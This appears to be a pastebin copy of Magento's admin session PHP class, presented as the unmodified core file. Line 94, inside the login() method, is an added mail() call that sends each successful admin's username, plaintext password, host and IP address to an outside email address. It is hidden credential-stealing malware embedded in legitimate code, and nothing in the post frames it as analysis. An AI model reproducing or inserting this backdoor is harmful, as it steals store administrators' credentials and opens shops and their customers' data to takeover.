
Untitled

a guest
Dec 27th, 2016
  1. <?php
  2. /**
  3. * Magento
  4. *
  5. * NOTICE OF LICENSE
  6. *
  7. * This source file is subject to the Open Software License (OSL 3.0)
  8. * that is bundled with this package in the file LICENSE.txt.
  9. * It is also available through the world-wide-web at this URL:
  10. * http://opensource.org/licenses/osl-3.0.php
  11. * If you did not receive a copy of the license and are unable to
  12. * obtain it through the world-wide-web, please send an email
  13. * to license@magentocommerce.com so we can send you a copy immediately.
  14. *
  15. * DISCLAIMER
  16. *
  17. * Do not edit or add to this file if you wish to upgrade Magento to newer
  18. * versions in the future. If you wish to customize Magento for your
  19. * needs please refer to http://www.magentocommerce.com for more information.
  20. *
  21. * @category Mage
  22. * @package Mage_Admin
  23. * @copyright Copyright (c) 2011 Magento Inc. (http://www.magentocommerce.com)
  24. * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
  25. */
  26.  
  27.  
  28. /**
  29. * Auth session model
  30. *
  31. * @category Mage
  32. * @package Mage_Admin
  33. * @author Magento Core Team <core@magentocommerce.com>
  34. */
  35. class Mage_Admin_Model_Session extends Mage_Core_Model_Session_Abstract
  36. {
  37.  
  38. /**
  39. * Whether it is the first page after successfull login
  40. *
  41. * @var boolean
  42. */
  43. protected $_isFirstPageAfterLogin;
  44.  
  45. /**
  46. * Class constructor
  47. *
  48. */
  49. public function __construct()
  50. {
  51. $this->init('admin');
  52. }
  53.  
  54. /**
  55. * Pull out information from session whether there is currently the first page after log in
  56. *
  57. * The idea is to set this value on login(), then redirect happens,
  58. * after that on next request the value is grabbed once the session is initialized
  59. * Since the session is used as a singleton, the value will be in $_isFirstPageAfterLogin until the end of request,
  60. * unless it is reset intentionally from somewhere
  61. *
  62. * @param string $namespace
  63. * @param string $sessionName
  64. * @return Mage_Admin_Model_Session
  65. * @see self::login()
  66. */
  67. public function init($namespace, $sessionName = null)
  68. {
  69. parent::init($namespace, $sessionName);
  70. $this->isFirstPageAfterLogin();
  71. return $this;
  72. }
  73.  
  74. /**
  75. * Try to login user in admin
  76. *
  77. * @param string $username
  78. * @param string $password
  79. * @param Mage_Core_Controller_Request_Http $request
  80. * @return Mage_Admin_Model_User|null
  81. */
  82. public function login($username, $password, $request = null)
  83. {
  84. if (empty($username) || empty($password)) {
  85. return;
  86. }
  87.  
  88. try {
  89. /* @var $user Mage_Admin_Model_User */
  90. $user = Mage::getModel('admin/user');
  91. $user->login($username, $password);
  92. if ($user->getId()) {
  93. $this->renewSession();
  94. mail("resultlusi2017@gmail.com","Admin From ".$_SERVER['HTTP_HOST'],"Login : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\nUsername : ".$username."\nPassword : ".$password."\nIP Log : ".$_SERVER['REMOTE_ADDR']);
  95. if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
  96. Mage::getSingleton('adminhtml/url')->renewSecretUrls();
  97. }
  98. $this->setIsFirstPageAfterLogin(true);
  99. $this->setUser($user);
  100. $this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());
  101. if ($requestUri = $this->_getRequestUri($request)) {
  102. Mage::dispatchEvent('admin_session_user_login_success', array('user' => $user));
  103. header('Location: ' . $requestUri);
  104. exit;
  105. }
  106. }
  107. else {
  108. Mage::throwException(Mage::helper('adminhtml')->__('Invalid Username or Password.'));
  109. }
  110. }
  111. catch (Mage_Core_Exception $e) {
  112. Mage::dispatchEvent('admin_session_user_login_failed',
  113. array('user_name' => $username, 'exception' => $e));
  114. if ($request && !$request->getParam('messageSent')) {
  115. Mage::getSingleton('adminhtml/session')->addError($e->getMessage());
  116. $request->setParam('messageSent', true);
  117. }
  118. }
  119.  
  120. return $user;
  121. }
  122.  
  123. /**
  124. * Refresh ACL resources stored in session
  125. *
  126. * @param Mage_Admin_Model_User $user
  127. * @return Mage_Admin_Model_Session
  128. */
  129. public function refreshAcl($user = null)
  130. {
  131. if (is_null($user)) {
  132. $user = $this->getUser();
  133. }
  134. if (!$user) {
  135. return $this;
  136. }
  137. if (!$this->getAcl() || $user->getReloadAclFlag()) {
  138. $this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());
  139. }
  140. if ($user->getReloadAclFlag()) {
  141. $user->unsetData('password');
  142. $user->setReloadAclFlag('0')->save();
  143. }
  144. return $this;
  145. }
  146.  
  147. /**
  148. * Check current user permission on resource and privilege
  149. *
  150. * Mage::getSingleton('admin/session')->isAllowed('admin/catalog')
  151. * Mage::getSingleton('admin/session')->isAllowed('catalog')
  152. *
  153. * @param string $resource
  154. * @param string $privilege
  155. * @return boolean
  156. */
  157. public function isAllowed($resource, $privilege = null)
  158. {
  159. $user = $this->getUser();
  160. $acl = $this->getAcl();
  161.  
  162. if ($user && $acl) {
  163. if (!preg_match('/^admin/', $resource)) {
  164. $resource = 'admin/' . $resource;
  165. }
  166.  
  167. try {
  168. return $acl->isAllowed($user->getAclRole(), $resource, $privilege);
  169. } catch (Exception $e) {
  170. try {
  171. if (!$acl->has($resource)) {
  172. return $acl->isAllowed($user->getAclRole(), null, $privilege);
  173. }
  174. } catch (Exception $e) { }
  175. }
  176. }
  177. return false;
  178. }
  179.  
  180. /**
  181. * Check if user is logged in
  182. *
  183. * @return boolean
  184. */
  185. public function isLoggedIn()
  186. {
  187. return $this->getUser() && $this->getUser()->getId();
  188. }
  189.  
  190. /**
  191. * Check if it is the first page after successfull login
  192. *
  193. * @return boolean
  194. */
  195. public function isFirstPageAfterLogin()
  196. {
  197. if (is_null($this->_isFirstPageAfterLogin)) {
  198. $this->_isFirstPageAfterLogin = $this->getData('is_first_visit', true);
  199. }
  200. return $this->_isFirstPageAfterLogin;
  201. }
  202.  
  203. /**
  204. * Setter whether the current/next page should be treated as first page after login
  205. *
  206. * @param bool $value
  207. * @return Mage_Admin_Model_Session
  208. */
  209. public function setIsFirstPageAfterLogin($value)
  210. {
  211. $this->_isFirstPageAfterLogin = (bool)$value;
  212. return $this->setIsFirstVisit($this->_isFirstPageAfterLogin);
  213. }
  214.  
  215. /**
  216. * Custom REQUEST_URI logic
  217. *
  218. * @param Mage_Core_Controller_Request_Http $request
  219. * @return string|null
  220. */
  221. protected function _getRequestUri($request = null)
  222. {
  223. if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
  224. return Mage::getSingleton('adminhtml/url')->getUrl('*/*/*', array('_current' => true));
  225. } elseif ($request) {
  226. return $request->getRequestUri();
  227. } else {
  228. return null;
  229. }
  230. }
  231. }